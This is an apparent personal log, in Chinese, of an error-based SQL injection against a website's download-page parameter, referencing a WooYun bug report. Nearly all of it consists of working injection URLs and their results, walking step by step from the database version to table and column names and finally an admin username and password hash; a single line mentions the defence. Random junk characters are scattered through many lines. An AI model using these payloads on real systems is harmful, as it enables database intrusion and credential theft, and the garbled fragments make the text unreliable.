http://www.wooyun.org/bugs/wooyun-2010-016669
之前想找个例子测试，没想到这里正好有，测了一下，仅作记录。（注：这类报错注入的前提是参数被直接拼进 SQL，且数据库错误信息回显到页面；改用参数化查询并关闭错误回显即可防御。）
( P5 M; q b9 v) }1 t O: }, V9 `http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003 T9 u( X3 Z* S4 l% {* ]
/data0/htdocs/leqi_new/app/myapp.php
或者
/**********version()**********/ 5.1.49-log
; n( ? t8 f) A* }& p; Phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) b L6 {. ?* M) x- ?% j
/**********user()**********/
1 E4 N5 m) w% g/ t) J! Y4 L' M' Y( vhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0034 |" A% c& h+ [1 U! M
/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003 E. W6 y8 P; v6 ^7 }1 w
/**********limit依次递归爆库**********/
2 t' q1 o6 H2 k A# I Khttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
7 X O( q" m( W' Uhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003# e9 d+ [0 o2 B8 M; E. C6 s. X( u
leqi
3 W7 s: I/ L& z+ l- ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test
/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users
/**********limit依次递归爆字段名**********/
R4 c: I0 g2 N( s4 k! b! u, U; hhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) R! V7 h- B- ^; E1 H: m7 T
user_id,username,nickname,passwd,group_id
# I3 Q$ ^0 F0 A6 Z, \3 |http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23- K. I5 y3 e/ i- N0 n. E+ j* U/ I
/wapc/5000_0005_0038 x& w. m" j8 N3 k
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
3 V- p- B) g% f! I6 r/wapc/5000_0005_003
11 341 351 361
/**********爆数据**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%236 m( n, R' }, h% a$ x% S" [
6a8b4574ca231eb8bd52764d4978ffcd